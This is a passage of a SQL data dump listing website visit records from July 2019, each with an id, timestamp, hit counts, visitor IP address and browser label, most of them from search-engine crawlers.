220','chrome'),(436676,1563745121,1,1,0,0,'66.249.66.218','chrome'),(436677,1563745736,1,1,0,0,'159.224.217.97','chrome'),(436678,1563746706,1,1,0,0,'40.77.167.24','other'),(436679,1563747172,1,1,0,0,'66.249.66.220','chrome'),(436680,1563747184,1,1,0,0,'66.249.66.218','chrome'),(436681,1563747366,1,1,0,0,'66.249.66.130','chrome'),(436682,1563748448,1,1,0,0,'207.46.13.181','other'),(436683,1563748526,1,1,0,0,'66.249.66.222','chrome'),(436684,1563748632,1,1,0,0,'180.76.15.33','other'),(436685,1563749553,2,2,0,0,'141.8.188.29','other'),(436686,1563749776,1,1,0,0,'207.46.13.181','other'),(436687,1563749992,1,1,0,0,'66.249.66.218','chrome'),(436688,1563750509,1,1,0,0,'8.29.198.27','other'),(436689,1563750551,2,2,0,0,'207.46.13.3','other'),(436690,1563751610,2,2,0,0,'141.8.188.29','other'),(436691,1563752266,1,1,0,0,'8.29.198.26','other'),(436692,1563752631,1,1,0,0,'66.249.66.218','chrome'),(436693,1563753314,1,1,0,0,'141.8.188.29','other'),(436694,1563753515,1,1,0,0,'66.249.66.220','chrome'),(436695,1563753573,1,1,0,0,'207.46.13.202','other'),(436696,1563753797,2,2,0,0,'207.46.13.199','other'),(436697,1563754217,2,2,0,0,'66.249.66.218','chrome'),(436698,1563754532,1,1,0,0,'46.211.102.212','chrome'),(436699,1563755016,1,1,0,0,'207.46.13.199','other'),(436700,1563756212,2,2,0,0,'66.249.66.222','chrome'),(436701,1563756408,1,1,0,0,'207.46.13.181','other'),(436702,1563756695,1,1,0,0,'66.249.66.218','chrome'),(436703,1563758674,1,1,0,0,'54.213.114.175','other'),(436704,1563759853,1,1,0,0,'66.249.66.128','chrome'),(436705,1563760075,1,1,0,0,'66.249.66.222','chrome'),(436706,1563760603,1,1,0,0,'207.46.13.202','other'),(436707,1563760897,2,2,0,0,'40.77.167.74','other'),(436708,1563761192,2,2,0,0,'66.249.66.222','chrome'),(436709,1563761366,1,1,0,0,'8.29.198.27','other'),(436710,1563763117,1,1,0,0,'8.29.198.26','other'),(436711,1563764053,1,1,0,0,'66.249.66.132','chrome'),(436712,1563765067,2,2,0,0,'141.8.188.29','other'),(436713,1563765549,1,1,0,0,'66.249.66.128','chrome'),(436714,1563765900,1,1,0,0,'66.249.66.218','chrome'),(436715,1563765916,1,1,0,0,'66.249.66.220','chrome'),(436716,1563766215,2,2,0,0,'139.28.219.138','chrome'),(436717,1563766502,1,1,0,0,'95.132.60.146','chrome'),(436718,1563767490,1,1,0,0,'207.46.13.79','other'),(436719,1563768117,1,1,0,0,'66.249.66.218','chrome'),(436720,1563768143,1,1,0,0,'40.77.167.81','other'),(436721,1563770183,1,1,0,0,'141.8.188.29','other'),(436722,1563770200,2,2,0,0,'66.249.66.218','chrome'),(436723,1563770645,1,1,0,0,'66.249.66.132','chrome'),(436724,1563770912,3,3,0,0,'207.46.13.220','other'),(436725,1563771906,1,1,0,0,'66.249.66.220','chrome'),(436726,1563771907,1,1,0,0,'91.196.178.175','chrome'),(436727,1563772139,1,1,0,0,'207.46.13.79','other'),(436728,1563772205,1,1,0,0,'8.29.198.27','other'),(436729,1563772274,2,2,0,0,'40.77.167.81','other'),(436730,1563772672,1,1,0,0,'5.3.152.189','msie'),(436731,1563773213,1,1,0,0,'91.196.178.135','firefox'),(436732,1563773981,1,1,0,0,'8.29.198.27','other'),(436733,1563773984,1,1,0,0,'66.249.66.218','chrome'),(436734,1563774079,1,1,0,0,'141.8.188.29','other'),(436735,1563774094,1,1,0,0,'128.124.17.162','chrome'),(436736,1563774354,1,1,0,0,'178.175.131.194','other'),(436737,1563775369,1,1,0,0,'66.249.66.220','chrome'),(436738,1563775897,2,2,0,0,'207.46.13.220','other'),(436739,1563777253,1,1,0,0,'141.8.188.29','other'),(436740,1563778409,1,1,0,0,'66.249.66.130','chrome'),(436741,1563780062,5,5,0,0,'207.46.13.79','other'),(436742,1563780198,1,1,0,0,'66.249.66.132','chrome'),(436743,1563780249,1,1,0,0,'66.249.66.220','chrome'),(436744,1563780502,7,7,0,0,'207.46.13.122','other'),(436745,1563780508,4,4,0,0,'207.46.13.220','other'),(436746,1563780678,7,7,0,0,'207.46.13.199','other'),(436747,1563781170,1,1,0,0,'91.196.177.46','firefox'),(436748,1563781826,1,1,0,0,'66.249.66.220','chrome'),(436749,1563781855,1,1,0,0,'66.249.66.218','chrome'),(436750,1563781951,1,1,0,0,'66.249.66.132','chrome'),(436751,1563782510,2,2,0,0,'207.46.13.211','other'),(436752,1563783058,1,1,0,0,'8.29.198.25','other'),(436753,1563783063,1,1,0,0,'207.46.13.12','other'),(436754,1563783627,2,2,0,0,'207.46.13.122','other'),(436755,1563784822,1,1,0,0,'8.29.198.25','other'),(436756,1563785553,1,1,0,0,'66.249.66.220','chrome'),(436757,1563785766,1,1,0,0,'66.249.66.222','chrome'),(436758,1563785799,1,1,0,0,'157.55.39.162','other'),(436759,1563787246,3,3,0,0,'66.249.66.218','chrome'),(436760,1563787351,1,1,0,0,'40.77.167.8','other'),(436761,1563787442,1,1,0,0,'66.249.66.222','chrome'),(436762,1563788107,1,1,0,0,'157.55.39.184','other'),(436763,1563788246,3,3,0,0,'66.249.66.218','chrome'),(436764,1563788938,3,3,0,0,'66.249.66.220','chrome'),(436765,1563788983,1,1,0,0,'66.249.66.130','chrome'),(436766,1563789616,1,1,0,0,'91.196.177.8','other'),(436767,1563790142,1,1,0,0,'66.249.66.128','chrome'),(436768,1563790297,1,1,0,0,'66.249.66.218','chrome'),(436769,1563790683,1,1,0,0,'109.74.154.72','chrome'),(436770,1563790919,2,2,0,0,'40.77.167.164','other'),(436771,1563791171,1,1,0,0,'178.92.251.113','chrome'),(436772,1563791268,1,1,0,0,'40.77.167.8','other'),(436773,1563791435,1,1,0,0,'66.249.66.218','chrome'),(436774,1563793444,1,1,0,0,'40.77.167.164','other'),(436775,1563793897,1,1,0,0,'8.29.198.25','other'),(436776,1563794029,1,1,0,0,'141.8.188.29','other'),(436777,1563794031,1,1,0,0,'66.249.66.130','chrome'),(436778,1563794130,3,3,0,0,'66.249.66.218','chrome'),(436779,1563795671,1,1,0,0,'8.29.198.27','other'),(436780,1563795818,1,1,0,0,'193.106.30.99','chrome'),(436781,1563796971,1,1,0,0,'66.249.66.128','chrome'),(436782,1563797838,1,1,0,0,'40.77.167.84','other'),(436783,1563797844,1,1,0,0,'157.55.39.184','other'),(436784,1563798658,1,1,0,0,'91.196.178.47','chrome'),(436785,1563799844,1,1,0,0,'141.8.188.29','other'),(436786,1563801489,2,2,0,0,'141.8.188.29','other'),(436787,1563802081,1,1,0,0,'91.196.178.90','chrome'),(436788,1563803158,1,1,0,0,'157.55.39.107','other'),(436789,1563803245,1,1,0,0,'66.249.66.222','chrome'),(436790,1563803280,1,1,0,0,'157.55.39.184','other'),(436791,1563803603,1,1,0,0,'66.249.66.220','chrome'),(436792,1563804228,1,1,0,0,'91.196.178.60','chrome'),(436793,1563804749,1,1,0,0,'8.29.198.26','other'),(436794,1563805366,1,1,0,0,'66.249.66.218','chrome'),(436795,1563806522,1,1,0,0,'8.29.198.26','other'),(436796,1563806698,2,2,0,0,'66.249.66.218','chrome'),(436797,1563806883,1,1,0,0,'207.46.13.180','other'),(436798,1563807019,1,1,0,0,'60.191.38.77','firefox'),(436799,1563807191,1,1,0,0,'157.55.39.107','other'),(436800,1563808708,1,1,0,0,'157.55.39.184','other'),(436801,1563809086,1,1,0,0,'46.211.135.99','chrome'),(436802,1563809163,1,1,0,0,'207.46.13.180','other'),(436803,1563809859,1,1,0,0,'141.8.188.29','other'),(436804,1563811217,2,2,0,0,'207.46.13.180','other'),(436805,1563812362,1,1,0,0,'157.55.39.184','other'),(436806,1563813559,3,3,0,0,'40.77.167.101','other'),(436807,1563814459,1,1,0,0,'157.55.39.107','other'),(436808,1563814699,1,1,0,0,'40.77.167.101','other'),(436809,1563815256,1,1,0,0,'118.154.113.223','chrome'),(436810,1563815330,1,1,0,0,'141.8.188.29','other'),(436811,1563815610,1,1,0,0,'8.29.198.26','other'),(436812,1563815678,1,1,0,0,'66.249.66.218','chrome'),(436813,1563816486,1,1,0,0,'157.55.39.107','other'),(436814,1563816537,1,1,0,0,'207.46.13.180','other'),(436815,1563816627,2,2,0,0,'207.46.13.199','other'),(436816,1563817394,1,1,0,0,'8.29.198.27','other'),(436817,1563818210,2,2,0,0,'40.77.167.101','other'),(436818,1563818317,1,1,0,0,'207.46.13.180','other'),(436819,1563819751,1,1,0,0,'207.46.13.180','other'),(436820,1563819795,1,1,0,0,'40.77.167.101','other'),(436821,1563820014,1,1,0,0,'66.249.66.218','chrome'),(436822,1563820033,1,1,0,0,'93.74.63.250','firefox'),(436823,1563821310,1,1,0,0,'141.8.188.29','other'),(436824,1563821763,2,2,0,0,'207.46.13.199','other'),(436825,1563821789,1,1,0,0,'91.196.178.133','chrome'),(436826,1563821976,1,1,0,0,'66.249.66.132','chrome'),(436827,1563823680,1,1,0,0,'40.77.167.70','other'),(436828,1563824519,1,1,0,0,'69.12.72.162','chrome'),(436829,1563824710,2,2,0,0,'95.213.141.126','opera'),(436830,1563826465,1,1,0,0,'8.29.198.25','other'),(436831,1563827098,2,2,0,0,'141.8.188.29','other'),(436832,1563827819,1,1,0,0,'157.55.39.182','other'),(436833,1563828241,1,1,0,0,'8.29.198.25','other'),(436834,1563828348,1,1,0,0,'141.8.188.29','other'),(436835,1563828967,1,1,0,0,'141.8.188.11','other'),(436836,1563829701,2,2,0,0,'157.55.39.67','other'),(436837,1563829816,2,2,0,0,'40.77.167.70','other'),(436838,1563831822,1,1,0,0,'5.45.207.19','other'),(436839,1563831854,1,1,0,0,'157.55.39.159','other'),(436840,1563832880,1,1,0,0,'40.77.167.70','other'),(436841,1563835134,1,1,0,0,'180.76.15.159','other'),(436842,1563835486,1,1,0,0,'40.77.167.70','other'),(436843,1563835490,11,11,0,0,'5.9.70.72','other'),(436844,1563835569,1,1,0,0,'66.249.66.220','chrome'),(436845,1563835572,1,1,0,0,'66.249.66.222','chrome'),(436846,1563835843,1,1,0,0,'141.8.188.11','other'),(436847,1563835868,1,1,0,0,'81.88.66.199','other'),(436848,1563836647,1,1,0,0,'66.249.66.218','chrome'),(436849,1563837327,1,1,0,0,'8.29.198.27','other'),(436850,1563839084,1,1,0,0,'8.29.198.25','other'),(436851,1563839427,1,1,0,0,'40.77.167.134','other'),(436852,1563840330,1,1,0,0,'141.8.188.29','other'),(436853,1563840376,2,2,0,0,'141.8.188.11','other'),(436854,1563841062,1,1,0,0,'66.249.66.132','chrome'),(436855,1563841568,1,1,0,0,'5.45.207.79','other'),(436856,1563842787,1,1,0,0,'157.55.39.178','other'),(436857,1563845724,1,1,0,0,'193.106.30.99','chrome'),(436858,1563846854,1,1,0,0,'66.249.66.218','chrome'),(436859,1563848168,1,1,0,0,'8.29.198.26','other'),(436860,1563848742,1,1,0,0,'66.249.66.220','chrome'),(436861,1563849647,2,2,0,0,'207.46.13.172','other'),(436862,1563849948,1,1,0,0,'8.29.198.27','other'),(436863,1563850627,1,1,0,0,'157.55.39.127','other'),(436864,1563852055,1,1,0,0,'157.55.39.160','other'),(436865,1563853487,1,1,0,0,'141.8.188.29','other'),(436866,1563854525,1,1,0,0,'141.8.188.29','other'),(436867,1563854526,1,1,0,0,'5.45.207.19','other'),(436868,1563854708,1,1,0,0,'13.66.139.0','other'),(436869,1563856675,1,1,0,0,'141.8.188.29','other'),(436870,1563856880,1,1,0,0,'40.77.167.167','other'),(436871,1563857410,1,1,0,0,'5.45.207.79','other'),(436872,1563857812,1,1,0,0,'207.46.13.133','other'),(436873,1563858693,1,1,0,0,'141.8.188.11','other'),(436874,1563858730,1,1,0,0,'178.154.171.27','other'),(436875,1563859017,1,1,0,0,'8.29.198.27','other'),(436876,1563859024,1,1,0,0,'94.180.155.22','msie'),(436877,1563859359,1,1,0,0,'129.211.98.123','other'),(436878,1563859440,1,1,0,0,'141.8.188.29','other'),(436879,1563860273,1,1,0,0,'207.46.13.109','other'),(436880,1563860811,1,1,0,0,'8.29.198.27','other'),(436881,1563860903,1,1,0,0,'85.248.227.164','other'),(436882,1563861226,1,1,0,0,'141.8.188.29','other'),(436883,1563861254,1,1,0,0,'46.211.100.195','chrome'),(436884,1563862355,1,1,0,0,'91.196.178.179','chrome'),(436885,1563862470,1,1,0,0,'180.76.15.16','other'),(436886,1563863022,2,2,0,0,'207.46.13.133','other'),(436887,1563863336,1,1,0,0,'46.188.98.10','chrome'),(436888,1563863649,1,1,0,0,'195.34.207.17','chrome'),(436889,1563864337,1,1,0,0,'66.249.66.220','chrome'),(436890,1563864687,3,3,0,0,'192.99.10.47','other'),(436891,1563866271,1,1,0,0,'40.77.167.43','other'),(436892,1563866979,1,1,0,0,'92.113.14.172','chrome'),(436893,1563867214,2,2,0,0,'40.77.167.43','other'),(436894,1563867422,1,1,0,0,'40.77.167.72','other'),(436895,1563868529,1,1,0,0,'66.249.66.220','chrome'),(436896,1563868761,1,1,0,0,'40.77.167.68','other'),(436897,1563869466,1,1,0,0,'66.249.66.222','chrome'),(436898,1563869694,1,1,0,0,'128.124.17.157','chrome'),(436899,1563869859,1,1,0,0,'8.29.198.27','other'),(436900,1563870509,1,1,0,0,'207.46.13.133','other'),(436901,1563871134,1,1,0,0,'93.74.165.120','chrome'),(436902,1563871334,1,1,0,0,'40.77.167.43','other'),(436903,1563871423,1,1,0,0,'40.77.167.68','other'),(436904,1563871669,1,1,0,0,'8.29.198.27','other'),(436905,1563871861,1,1,0,0,'207.46.13.133','other'),(436906,1563871865,1,1,0,0,'193.106.30.99','chrome'),(436907,1563872041,2,2,0,0,'40.77.167.139','other'),(436908,1563872306,1,1,0,0,'66.249.66.132','chrome'),(436909,1563872827,1,1,0,0,'207.46.13.133','other'),(436910,1563872861,1,1,0,0,'91.196.178.90','chrome'),(436911,1563872916,2,2,0,0,'195.211.173.159','chrome'),(436912,1563873054,2,2,0,0,'40.77.167.43','other'),(436913,1563873376,1,1,0,0,'40.77.167.139','other'),(436914,1563873982,1,1,0,0,'141.8.188.29','other'),(436915,1563874875,3,3,0,0,'40.77.167.43','other'),(436916,1563875449,1,1,0,0,'194.60.255.245','chrome'),(436917,1563875454,1,1,0,0,'141.8.188.11','other'),(436918,1563875723,3,3,0,0,'40.77.167.139','other'),(436919,1563875893,1,1,0,0,'40.77.167.43','other'),(436920,1563875950,1,1,0,0,'91.196.178.77','firefox'),(436921,1563876545,1,1,0,0,'207.46.13.242','other'),(436922,1563876873,1,1,0,0,'157.55.39.219','other'),(436923,1563877012,1,1,0,0,'40.77.167.139','other'),(436924,1563877487,1,1,0,0,'109.74.154.72','chrome'),(436925,1563877963,1,1,0,0,'5.45.207.19','other'),(436926,1563878428,1,1,0,0,'157.55.39.219','other'),(436927,1563878973,1,1,0,0,'66.249.66.222','chrome'),(436928,1563879183,1,1,0,0,'130.180.218.83','chrome'),(436929,1563879377,1,1,0,0,'40.77.167.43','other'),(436930,1563879391,2,2,0,0,'141.8.188.29','other'),(436931,1563880240,1,1,0,0,'40.77.167.139','other'),(436932,1563880672,1,1,0,0,'207.46.13.57','other'),(436933,1563880713,1,1,0,0,'8.29.198.25','other'),(436934,1563880797,2,2,0,0,'157.55.39.219','other'),(436935,1563881143,2,2,0,0,'207.46.13.116','other'),(436936,1563882523,1,1,0,0,'8.29.198.25','other'),(436937,1563882579,2,2,0,0,'173.208.200.154','other'),(436938,1563882618,1,1,0,0,'207.46.13.116','other'),(436939,1563882622,1,1,0,0,'157.55.39.219','other'),(436940,1563882629,2,2,0,0,'207.46.13.57','other'),(436941,1563883334,1,1,0,0,'45.122.223.61','firefox'),(436942,1563884458,1,1,0,0,'207.46.13.51','other'),(436943,1563884689,1,1,0,0,'157.55.39.219','other'),(436944,1563885621,1,1,0,0,'157.55.39.219','other'),(436945,1563886672,2,2,0,0,'207.46.13.153','other'),(436946,1563886696,1,1,0,0,'207.46.13.116','other'),(436947,1563886700,1,1,0,0,'157.55.39.219','other'),(436948,1563887606,1,1,0,0,'141.8.188.29','other'),(436949,1563887816,1,1,0,0,'207.46.13.116','other'),(436950,1563888206,1,1,0,0,'141.8.188.11','other'),(436951,1563888212,1,1,0,0,'207.46.13.153','other'),(436952,1563888541,1,1,0,0,'207.46.13.51','other'),(436953,1563888855,1,1,0,0,'66.249.66.220','chrome'),(436954,1563889009,1,1,0,0,'207.46.13.116','other'),(436955,1563889583,1,1,0,0,'66.102.9.30','chrome'),(436956,1563891149,1,1,0,0,'141.8.188.29','other'),(436957,1563891300,4,4,0,0,'207.46.13.116','other'),(436958,1563891313,1,1,0,0,'207.46.13.51','other'),(436959,1563891447,1,1,0,0,'207.46.13.200','other'),(436960,1563891574,1,1,0,0,'8.29.198.26','other'),(436961,1563891764,1,1,0,0,'91.196.178.74','firefox'),(436962,1563891786,2,2,0,0,'207.46.13.153','other'),(436963,1563892691,1,1,0,0,'207.46.13.200','other'),(436964,1563893211,1,1,0,0,'207.46.13.51','other'),(436965,1563893400,1,1,0,0,'8.29.198.25','other'),(436966,1563893711,1,1,0,0,'180.76.15.136','other'),(436967,1563893776,1,1,0,0,'207.46.13.153','other'),(436968,1563894262,1,1,0,0,'141.8.188.29','other'),(436969,1563894913,1,1,0,0,'207.46.13.116','other'),(436970,1563895009,2,2,0,0,'207.46.13.153','other'),(436971,1563895040,1,1,0,0,'207.46.13.200','other'),(436972,1563895393,3,3,0,0,'207.46.13.51','other'),(436973,1563896518,1,1,0,0,'207.46.13.51','other'),(436974,1563897761,1,1,0,0,'207.46.13.153','other'),(436975,1563898095,1,1,0,0,'207.46.13.51','other'),(436976,1563898344,1,1,0,0,'207.46.13.200','other'),(436977,1563898349,2,2,0,0,'207.46.13.116','other'),(436978,1563898525,1,1,0,0,'193.106.30.99','chrome'),(436979,1563899122,1,1,0,0,'207.46.13.153','other'),(436980,1563899780,1,1,0,0,'141.8.188.11','other'),(436981,1563900385,1,1,0,0,'207.46.13.33','other'),(436982,1563900434,1,1,0,0,'212.1.71.6','chrome'),(436983,1563900462,1,1,0,0,'157.55.39.235','other'),(436984,1563900731,1,1,0,0,'66.249.66.220','chrome'),(436985,1563901515,1,1,0,0,'207.46.13.153','other'),(436986,1563901643,1,1,0,0,'207.46.13.108','other'),(436987,1563902105,2,2,0,0,'66.249.66.220','chrome'),(436988,1563902316,2,2,0,0,'207.46.13.33','other'),(436989,1563902425,1,1,0,0,'8.29.198.27','other'),(436990,1563902570,1,1,0,0,'40.77.167.218','other'),(436991,1563902721,1,1,0,0,'207.46.13.153','other'),(436992,1563903224,1,1,0,0,'141.8.188.29','other'),(436993,1563903268,2,2,0,0,'207.46.13.108','other'),(436994,1563903424,1,1,0,0,'207.46.13.33','other'),(436995,1563903755,2,2,0,0,'207.46.13.153','other'),(436996,1563904134,1,1,0,0,'91.196.178.74','firefox'),(436997,1563904258,1,1,0,0,'8.29.198.26','other'),(436998,1563904317,1,1,0,0,'188.190.226.99','chrome'),(436999,1563904578,2,2,0,0,'207.46.13.33','other'),(437000,1563905144,1,1,0,0,'178.154.171.24','other'),(437001,1563905242,1,1,0,0,'40.77.167.67','other'),(437002,1563905963,1,1,0,0,'66.249.66.128','chrome'),(437003,1563906121,2,2,0,0,'60.191.38.77','firefox'),(437004,1563906655,1,1,0,0,'157.55.39.78','other'),(437005,1563906971,2,2,0,0,'40.77.167.67','other'),(437006,1563907012,1,1,0,0,'141.8.188.11','other'),(437007,1563907214,1,1,0,0,'5.45.207.79','other'),(437008,1563907417,1,1,0,0,'207.46.13.60','other'),(437009,1563907437,1,1,0,0,'207.46.13.33','other'),(437010,1563907470,1,1,0,0,'46.211.104.183','chrome'),(437011,1563907989,3,3,0,0,'40.77.167.67','other'),(437012,1563908239,1,1,0,0,'91.196.178.22','chrome'),(437013,1563908714,1,1,0,0,'40.77.167.36','other'),(437014,1563909021,1,1,0,0,'94.180.132.84','firefox'),(437015,1563909718,1,1,0,0,'5.45.207.79','other'),(437016,1563910012,1,1,0,0,'66.249.66.132','chrome'),(437017,1563910170,2,2,0,0,'40.77.167.221','other'),(437018,1563910586,1,1,0,0,'5.45.207.8','other'),(437019,1563912039,1,1,0,0,'141.8.132.16','other'),(437020,1563912177,1,1,0,0,'178.154.200.48','other'),(437021,1563912356,1,1,0,0,'207.46.13.39','other'),(437022,1563912771,1,1,0,0,'87.250.224.64','other'),(437023,1563912787,2,2,0,0,'157.55.39.136','other'),(437024,1563913267,1,1,0,0,'8.29.198.26','other'),(437025,1563913330,1,1,0,0,'40.77.167.197','other'),(437026,1563913791,1,1,0,0,'207.46.13.39','other'),(437027,1563915109,1,1,0,0,'8.29.198.25','other'),(437028,1563915166,1,1,0,0,'40.77.167.197','other'),(437029,1563915890,2,2,0,0,'207.46.13.43','other'),(437030,1563916142,1,1,0,0,'157.55.39.136','other'),(437031,1563917168,2,2,0,0,'141.8.188.29','other'),(437032,1563917194,1,1,0,0,'207.46.13.43','other'),(437033,1563917352,2,2,0,0,'207.46.13.39','other'),(437034,1563917503,1,1,0,0,'35.225.132.39','other'),(437035,1563917767,1,1,0,0,'157.55.39.136','other'),(437036,1563918678,1,1,0,0,'207.46.13.43','other'),(437037,1563918803,1,1,0,0,'207.46.13.39','other'),(437038,1563919609,1,1,0,0,'213.180.203.17','other'),(437039,1563919738,2,2,0,0,'157.55.39.136','other'),(437040,1563920178,1,1,0,0,'207.46.13.43','other'),(437041,1563920448,1,1,0,0,'51.68.152.26','chrome'),(437042,1563920528,1,1,0,0,'66.249.66.132','chrome'),(437043,1563921501,1,1,0,0,'66.249.66.132','chrome'),(437044,1563921591,1,1,0,0,'40.77.167.125','other'),(437045,1563921843,1,1,0,0,'66.249.66.218','chrome'),(437046,1563922226,1,1,0,0,'157.55.39.136','other'),(437047,1563922416,1,1,0,0,'66.249.66.222','chrome'),(437048,1563922561,1,1,0,0,'66.249.66.128','chrome'),(437049,1563922868,2,2,0,0,'40.77.167.125','other'),(437050,1563923146,2,2,0,0,'207.46.13.39','other'),(437051,1563923606,3,3,0,0,'66.249.66.222','chrome'),(437052,1563923623,1,1,0,0,'66.249.66.218','chrome'),(437053,1563923877,1,1,0,0,'40.77.167.125','other'),(437054,1563924077,1,1,0,0,'66.249.66.220','chrome'),(437055,1563924103,1,1,0,0,'8.29.198.26','other'),(437056,1563924388,2,2,0,0,'157.55.39.136','other'),(437057,1563925638,1,1,0,0,'141.8.188.11','other'),(437058,1563925932,1,1,0,0,'157.55.39.68','other'),(437059,1563925960,1,1,0,0,'8.29.198.26','other'),(437060,1563926064,1,1,0,0,'141.8.188.29','other'),(437061,1563926102,1,1,0,0,'66.249.66.218','chrome'),(437062,1563926430,1,1,0,0,'66.249.66.220','chrome'),(437063,1563927414,1,1,0,0,'141.8.188.11','other'),(437064,1563927971,1,1,0,0,'66.249.66.222','chrome'),(437065,1563928050,1,1,0,0,'66.249.66.220','chrome'),(437066,1563928074,1,1,0,0,'66.249.66.128','chrome'),(437067,1563928132,1,1,0,0,'66.249.66.218','chrome'),(437068,1563928837,1,1,0,0,'141.8.188.11','other'),(437069,1563929013,1,1,0,0,'40.77.167.216','other'),(437070,1563929438,1,1,0,0,'66.249.66.218','chrome'),(437071,1563929615,1,1,0,0,'66.249.66.222','chrome'),(437072,1563929659,2,2,0,0,'40.77.167.125','other'),(437073,1563930921,2,2,0,0,'66.249.66.222','chrome'),(437074,1563931464,1,1,0,0,'207.46.13.39','other'),(437075,1563931590,1,1,0,0,'5.45.207.8','other'),(437076,1563932011,2,2,0,0,'66.249.66.218','chrome'),(437077,1563932185,1,1,0,0,'66.249.66.132','chrome'),(437078,1563932469,2,2,0,0,'40.77.167.216','other'),(437079,1563932725,3,3,0,0,'207.46.13.149','other'),(437080,1563933040,1,1,0,0,'213.180.203.48','other'),(437081,1563934109,1,1,0,0,'66.249.66.222','chrome'),(437082,1563934225,1,1,0,0,'40.77.167.216','other'),(437083,1563934373,1,1,0,0,'213.180.203.48','other'),(437084,1563934536,1,1,0,0,'87.250.224.64','other'),(437085,1563934948,1,1,0,0,'8.29.198.27','other'),(437086,1563935123,1,1,0,0,'207.46.13.149','other'),(437087,1563935414,1,1,0,0,'66.249.66.218','chrome'),(437088,1563935626,2,2,0,0,'66.249.66.220','chrome'),(437089,1563935880,1,1,0,0,'40.77.167.190','other'),(437090,1563935998,2,2,0,0,'40.77.167.66','other'),(437091,1563936821,1,1,0,0,'8.29.198.27','other'),(437092,1563936937,1,1,0,0,'91.196.178.174','chrome'),(437093,1563937120,1,1,0,0,'40.77.167.26','other'),(437094,1563937212,2,2,0,0,'66.249.66.222','chrome'),(437095,1563938015,1,1,0,0,'66.249.66.220','chrome'),(437096,1563938177,2,2,0,0,'91.209.11.236','other'),(437097,1563938207,2,2,0,0,'66.249.66.222','chrome'),(437098,1563938690,1,1,0,0,'40.77.167.26','other'),(437099,1563938962,1,1,0,0,'141.8.188.11','other'),(437100,1563939268,1,1,0,0,'91.209.11.236','other'),(437101,1563939390,2,2,0,0,'40.77.167.190','other'),(437102,1563939459,2,2,0,0,'66.249.66.220','chrome'),(437103,1563939474,1,1,0,0,'141.8.188.29','other'),(437104,1563940198,2,2,0,0,'157.55.39.226','other'),(437105,1563940301,1,1,0,0,'66.249.66.222','chrome'),(437106,1563940320,1,1,0,0,'13.66.139.0','other'),(437107,1563940529,1,1,0,0,'66.249.66.128','chrome'),(437108,1563940561,1,1,0,0,'66.249.66.132','chrome'),(437109,1563941247,1,1,0,0,'180.76.15.5','other'),(437110,1563941851,1,1,0,0,'40.77.167.190','other'),(437111,1563942469,1,1,0,0,'95.108.181.75','other'),(437112,1563942946,2,2,0,0,'66.249.66.222','chrome'),(437113,1563942998,1,1,0,0,'66.249.66.220','chrome'),(437114,1563943033,2,2,0,0,'207.46.13.205','other'),(437115,1563943057,1,1,0,0,'66.249.66.130','chrome'),(437116,1563943257,1,1,0,0,'40.77.167.190','other'),(437117,1563944314,1,1,0,0,'66.249.66.218','chrome'),(437118,1563944844,2,2,0,0,'66.249.66.220','chrome'),(437119,1563945792,1,1,0,0,'8.29.198.27','other'),(437120,1563945874,1,1,0,0,'180.76.15.153','other'),(437121,1563945941,1,1,0,0,'91.196.178.90','chrome'),(437122,1563946180,1,1,0,0,'40.77.167.190','other'),(437123,1563946224,1,1,0,0,'178.121.248.52','chrome'),(437124,1563946573,1,1,0,0,'66.249.66.222','chrome'),(437125,1563946622,1,1,0,0,'66.249.66.218','chrome'),(437126,1563947152,1,1,0,0,'185.220.101.45','other'),(437127,1563947267,1,1,0,0,'66.249.66.128','chrome'),(437128,1563947661,1,1,0,0,'8.29.198.26','other'),(437129,1563947937,1,1,0,0,'107.21.1.8','other'),(437130,1563947940,1,1,0,0,'54.208.102.37','other'),(437131,1563948121,1,1,0,0,'66.249.66.130','chrome'),(437132,1563948551,1,1,0,0,'66.249.66.220','chrome'),(437133,1563949135,3,3,0,0,'66.249.66.218','chrome'),(437134,1563949311,1,1,0,0,'40.77.167.218','other'),(437135,1563949478,2,2,0,0,'157.55.39.237','other'),(437136,1563949722,1,1,0,0,'66.249.66.130','chrome'),(437137,1563949881,1,1,0,0,'195.230.119.58','chrome'),(437138,1563950064,1,1,0,0,'66.249.66.220','chrome'),(437139,1563950425,1,1,0,0,'66.249.66.222','chrome'),(437140,1563951129,1,1,0,0,'141.8.142.103','other'),(437141,1563952273,1,1,0,0,'66.249.66.218','chrome'),(437142,1563952519,1,1,0,0,'46.211.104.132','other'),(437143,1563952570,8,8,0,0,'157.55.39.237','other'),(437144,1563952661,2,2,0,0,'66.249.66.220','chrome'),(437145,1563952783,4,4,0,0,'40.77.167.218','other'),(437146,1563953117,1,1,0,0,'141.8.183.23','other'),(437147,1563953327,1,1,0,0,'66.249.66.218','chrome'),(437148,1563953366,3,3,0,0,'157.55.39.111','other'),(437149,1563953370,4,4,0,0,'207.46.13.149','other'),(437150,1563953908,1,1,0,0,'91.196.178.104','chrome'),(437151,1563954344,2,2,0,0,'66.249.66.218','chrome'),(437152,1563954576,1,1,0,0,'40.77.167.218','other'),(437153,1563955373,1,1,0,0,'66.249.66.132','chrome'),(437154,1563955650,1,1,0,0,'95.108.213.50','other'),(437155,1563955885,1,1,0,0,'40.77.167.218','other'),(437156,1563955955,1,1,0,0,'66.249.66.218','chrome'),(437157,1563956044,1,1,0,0,'157.55.39.237','other'),(437158,1563956439,1,1,0,0,'157.55.39.111','other'),(437159,1563956662,1,1,0,0,'8.29.198.27','other'),(437160,1563956909,3,3,0,0,'66.249.66.220','chrome'),(437161,1563957165,1,1,0,0,'66.249.66.218','chrome'),(437162,1563957327,1,1,0,0,'66.249.66.222','chrome'),(437163,1563958537,1,1,0,0,'8.29.198.26','other'),(437164,1563958734,1,1,0,0,'91.196.178.90','chrome'),(437165,1563958776,2,2,0,0,'66.249.66.220','chrome'),(437166,1563958949,2,2,0,0,'66.249.66.222','chrome'),(437167,1563959124,1,1,0,0,'37.52.108.11','chrome'),(437168,1563959295,2,2,0,0,'91.196.178.79','chrome'),(437169,1563959744,1,1,0,0,'91.196.178.130','firefox'),(437170,1563960647,1,1,0,0,'66.249.66.218','chrome'),(437171,1563961709,1,1,0,0,'66.249.66.218','chrome'),(437172,1563962341,1,1,0,0,'66.249.66.222','chrome'),(437173,1563962481,1,1,0,0,'91.196.178.103','chrome'),(437174,1563963479,1,1,0,0,'207.46.13.190','other'),(437175,1563963774,1,1,0,0,'109.74.154.72','chrome'),(437176,1563963843,1,1,0,0,'209.17.97.10','other'),(437177,1563964259,1,1,0,0,'157.55.39.210','other'),(437178,1563964775,2,2,0,0,'95.213.141.126','opera'),(437179,1563965022,2,2,0,0,'13.66.139.0','other'),(437180,1563965089,1,